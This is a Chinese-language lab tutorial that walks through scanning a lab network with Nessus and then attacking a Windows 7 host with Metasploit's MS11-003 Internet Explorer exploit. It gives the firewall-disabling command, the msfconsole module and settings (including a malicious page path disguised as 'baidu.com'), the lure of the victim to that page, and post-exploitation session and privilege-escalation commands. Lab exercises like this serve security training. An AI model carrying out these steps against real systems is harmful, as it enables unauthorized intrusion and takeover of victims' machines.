Metasploit攻击win7实例

Nessus基本介绍

Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的企业版。Nessus6.0以后采取Browser/Server模式,Server端负责进行安全检查、具体的扫描任务,客户端用来配置管理服务器端。服务端采用plug-in的体系,允许用户加入执行特定功能的插件,这插件可以进行更快速和更复杂的安全检查。Nessus自带大量安全检查插件能够满足一般用户的安全评估任务需要,如果有特殊需要也可以将自己开发的安全检查插件集成到Nessus中。

和其他安全扫描工具相比,Nessus主要优势在于免费、扩展性强,容易使用以及能够对目标系统进行全面的漏洞扫描。

默认状态下, Nessus安装成功后会开机自启动,用户使用安装时配置的账号登陆其管理界面,添加扫描任务,根据相关需要对扫描任务的相关属性进行详细的配置。等扫描完成以后,会生成一份详细的报告,报告里会将扫描结果按照危险系数高低分成高危漏洞、中危漏洞、低危漏洞三类,我们一般重点关注高危漏洞,中危漏洞利用条件会比较苛刻,低危漏洞基本没有利用的可能。查看高危漏洞详情,根据漏洞简介信息使用google搜索是否存在已知的Exp和攻击方法可以提高安全测试效率。

实验目的

通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试、攻击。

步骤1

初步了解实验环境及Nessus安装、

为了更好的演示攻击win7系统实例需要关闭win7系统的防火墙,win+R输入cmd,运行“netsh firewall set opmode mode=disable”命令

Metasploit攻击win7实例

 

 步骤二

利用Nessus扫描目标主机

执行命令 /etc/init.d/nessusd start 启动Nessus服务

Metasploit攻击win7实例

登陆Nessus

新建一个扫描,配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描

Metasploit攻击win7实例

Nessus扫描网段结果,重点关注10.1.1.129主机,即win7靶机,Nessus扫描出该主机存在四个最高危漏洞、2个高危漏洞及其它漏洞问题。

 

 Metasploit攻击win7实例

 

 步骤三

利用MS11_003 IE漏洞攻击win7主机

1.在kali中执行“msfconsole”,启动metasploit

2.运行命令:“use exploit/windows/browser/ms11_003_ie_css_import”选择漏洞利用EXP

设置生成的恶意网页的URI为baidu.com

运行命令:set URIPATH baidu.com.  为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080  设置攻击负载

设置LHOST以绑定本地IP

 Metasploit攻击win7实例

 

行命令“exploit”开始进行攻击

Metasploit攻击win7实例

 

 在 Win7靶机打开IE,访问http://10.1.1.128:8060/baidu.com,模拟受害者误点击网页 

验证攻击是否成功。列出当前成功建立的回话,任意进入一个回话,查看攻击者的身份。可以尝试使用getsystem进行进一步的提权,如果提权失败则可以采取上传提权exe程序进行提权的方案获得最高权限。

sessions   列出所有会话

sessions -i 1   进入1号会话

getuid   查看当前用户

Metasploit攻击win7实例

 

 Metasploit攻击win7实例

 

 

上一篇:Metasploit攻击win7实例


下一篇:metasploit-1